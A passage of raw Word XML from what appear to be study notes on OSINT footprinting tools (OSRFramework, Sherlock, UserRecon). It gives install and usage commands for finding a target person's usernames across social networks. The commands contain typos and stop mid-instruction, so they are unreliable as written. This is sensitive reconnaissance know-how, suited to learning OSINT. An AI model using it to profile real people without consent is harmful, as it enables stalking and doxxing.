              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="0CF54677" w14:textId="6A7A9B0E" w:rsidR="00B23AE6" w:rsidRDefault="00B23AE6" w:rsidP="00D21B87">
            <w:r>
              <w:t>14.</w:t>
            </w:r>
            <w:r w:rsidR="00BA5D3E">
              <w:t>e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="0DC4EBF2" w14:textId="77777777" w:rsidR="00BA5D3E" w:rsidRDefault="00BA5D3E" w:rsidP="00BA5D3E">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>OSRFramework</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EA39540" w14:textId="575FB58E" w:rsidR="00B23AE6" w:rsidRPr="00BA5D3E" w:rsidRDefault="00BA5D3E" w:rsidP="00BA5D3E">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA5D3E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>usufy.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="16F672D5" w14:textId="0406296E" w:rsidR="00BA5D3E" w:rsidRPr="00BA5D3E" w:rsidRDefault="00BA5D3E" w:rsidP="00BA5D3E">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA5D3E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>searchfy.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50D148E1" w14:textId="253D2C95" w:rsidR="00BA5D3E" w:rsidRPr="00BA5D3E" w:rsidRDefault="00BA5D3E" w:rsidP="00BA5D3E">
            <w:pPr>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00BA5D3E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>m</w:t>
            </w:r>
            <w:r w:rsidR="00BA09F1">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA5D3E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>ailfy.py</w:t>
            </w:r>
            <w:r w:rsidRPr="00BA5D3E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:br/>
              <w:t>phonefy.py</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="389D070B" w14:textId="2EEAFCDD" w:rsidR="00BA5D3E" w:rsidRDefault="00BA5D3E" w:rsidP="00BA5D3E">
            <w:r w:rsidRPr="00BA5D3E">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>entify.py</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D929623" w14:textId="77777777" w:rsidR="00B23AE6" w:rsidRDefault="00BA5D3E" w:rsidP="00D21B87">
            <w:r w:rsidRPr="00BA5D3E">
              <w:t>OSRFramework is a set of libraries that are used to perform Open Source Intelligence tasks. They include references to many different applications related to username checking, DNS lookups, information leaks research, deep web search, regular expressions extraction, and many others.</w:t>
            </w:r>
            <w:r w:rsidR="0091106B">
              <w:br/>
              <w:t>These OSR Frameworks all work in a similar way. They can be installed with:</w:t>
            </w:r>
            <w:r w:rsidR="0091106B">
              <w:br/>
            </w:r>
            <w:r w:rsidR="0091106B">
              <w:tab/>
            </w:r>
            <w:r w:rsidR="0091106B" w:rsidRPr="005B05DA">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidR="0091106B" w:rsidRPr="005B05DA">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt-get </w:t>
            </w:r>
            <w:r w:rsidR="0091106B" w:rsidRPr="005B05DA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidR="0091106B" w:rsidRPr="005B05DA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>pip</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B23F33B" w14:textId="5AF9597E" w:rsidR="0091106B" w:rsidRDefault="0091106B" w:rsidP="00D21B87">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="005B05DA">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="005B05DA">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> pip</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005B05DA">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="005B05DA">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F60139" w14:paraId="6562652E" w14:textId="77777777" w:rsidTr="00716493">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="052CEF1F" w14:textId="77777777" w:rsidR="00F60139" w:rsidRDefault="00F60139" w:rsidP="00716493"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2390" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="27DE19FB" w14:textId="77777777" w:rsidR="00F60139" w:rsidRDefault="00F60139" w:rsidP="00716493">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0E9781FC" w14:textId="6D3369E9" w:rsidR="00F60139" w:rsidRDefault="00F60139" w:rsidP="00716493"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79BCC84A" w14:textId="77777777" w:rsidR="00413616" w:rsidRDefault="00413616"/>
    <w:p w14:paraId="3329E005" w14:textId="77777777" w:rsidR="00413616" w:rsidRDefault="00413616">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="306CA8B6" w14:textId="2F94B8EC" w:rsidR="00413616" w:rsidRDefault="00413616" w:rsidP="00413616">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Footprinting: </w:t>
      </w:r>
      <w:r w:rsidR="001E5275" w:rsidRPr="001E5275">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Sherlock</w:t>
      </w:r>
      <w:r w:rsidR="00A83499">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00A83499">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> UserRecon</w:t>
      </w:r>
      <w:r w:rsidR="00F2449C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004902E4">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>|</w:t>
      </w:r>
      <w:r w:rsidR="00F2449C">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00B74665">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Followerwonk</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1054"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="615"/>
        <w:gridCol w:w="2483"/>
        <w:gridCol w:w="7929"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B74665" w14:paraId="6B96B972" w14:textId="77777777" w:rsidTr="00B268A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="272A3C63" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>15.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2483" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1A5B61E2" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>sherlock</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7929" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3EC6CC41" w14:textId="77777777" w:rsidR="00B74665" w:rsidRPr="000079AE" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>Sherlock is a python-based tool that is used to gather information about a target person over various social networking sites. Sherlock searches a vast number of social networking sites for a given target user, locates the person, and displays the results along with the complete URL related to the target person.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="370ED051" w14:textId="77777777" w:rsidTr="00B268A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="10553078" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>15.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2483" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="2F312E5B" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7929" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0CCC2CD5" w14:textId="62EE3DC1" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>First of all, make sure pip is installed:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">install </w:t>
            </w:r>
            <w:r w:rsidRPr="0003467C">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>pip</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:t>Next, clone the repo from GitHub:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">git </w:t>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">clone </w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/sherlock-project/sherlock.git</w:t>
            </w:r>
            <w:r w:rsidRPr="004902E4">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:t>Change directory to sherlock</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>sherlock</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0FE09DB5" w14:textId="77777777" w:rsidR="00B74665" w:rsidRPr="009C4612" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>Next, install the requirements using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">python3 </w:t>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-m</w:t>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>pip install -r</w:t>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>requirements.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="1D0C1433" w14:textId="77777777" w:rsidTr="00B268A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="4E5A89AB" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>15.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2483" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="02604196" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7929" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="41C0D083" w14:textId="77777777" w:rsidR="00B74665" w:rsidRPr="00C93BB1" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:t>You can use sherlock by using the following command:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>python3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">cd </w:t>
            </w:r>
            <w:r w:rsidRPr="00C93BB1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-v </w:t>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve">~/sherlock/sherlock/sherlock.py </w:t>
            </w:r>
            <w:r w:rsidRPr="009C4612">
              <w:rPr>
                <w:color w:val="385623" w:themeColor="accent6" w:themeShade="80"/>
              </w:rPr>
              <w:t>UserName</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C93BB1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-v</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Give more info</w:t>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C93BB1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t xml:space="preserve">-o </w:t>
            </w:r>
            <w:r w:rsidRPr="00C93BB1">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>NAME</w:t>
            </w:r>
            <w:r>
              <w:tab/>
              <w:t>Output results to a file</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C93BB1">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-b</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00C93BB1">
              <w:t>Browse to all results on default browser</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="208C61CC" w14:textId="77777777" w:rsidTr="00B268A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="736FB480" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>15.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2483" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1F6C99BF" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>UserRecon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7929" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="245308FC" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="4764"/>
              </w:tabs>
            </w:pPr>
            <w:r w:rsidRPr="00A83499">
              <w:t>UserRecon tool is used to find usernames across over 75 social networks. It is very useful when you are running an investigation to determine the usage of the same username across different social media platforms such as Twitter, Instagram, MySpace, Youtube, Reddit, WordPress, GitHub, and many more. With the push of a button, an OSINT investigator will be able to find whether the same username exists on different social media networks. It is a very convenient and easy-to-use tool</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00B74665" w14:paraId="16286D54" w14:textId="77777777" w:rsidTr="00B268A2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="615" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFE599" w:themeFill="accent4" w:themeFillTint="66"/>
          </w:tcPr>
          <w:p w14:paraId="44909611" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r>
              <w:t>15.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2483" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFF2CC" w:themeFill="accent4" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="79D9E489" w14:textId="77777777" w:rsidR="00B74665" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7929" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="37215E38" w14:textId="77777777" w:rsidR="00B74665" w:rsidRPr="00A83499" w:rsidRDefault="00B74665" w:rsidP="00B74665">
            <w:r w:rsidRPr="00A83499">
              <w:t>Open your terminal and type the following command</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">git </w:t>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>clone</w:t>
            </w:r>
            <w:r w:rsidRPr="00A83499">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>https://github.com/issamelferkh/userrecon.git</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00A83499">
              <w:t>After cloning the tool, change the directory to UserRecon</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>cd</w:t>
            </w:r>
            <w:r w:rsidRPr="00A83499">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>userrecon</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00A83499">
              <w:t>Now list all hidden files using ls -la command in your terminal</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>ls</w:t>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>-la</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00383365">
              <w:t>Change the permission of userrecon.sh</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
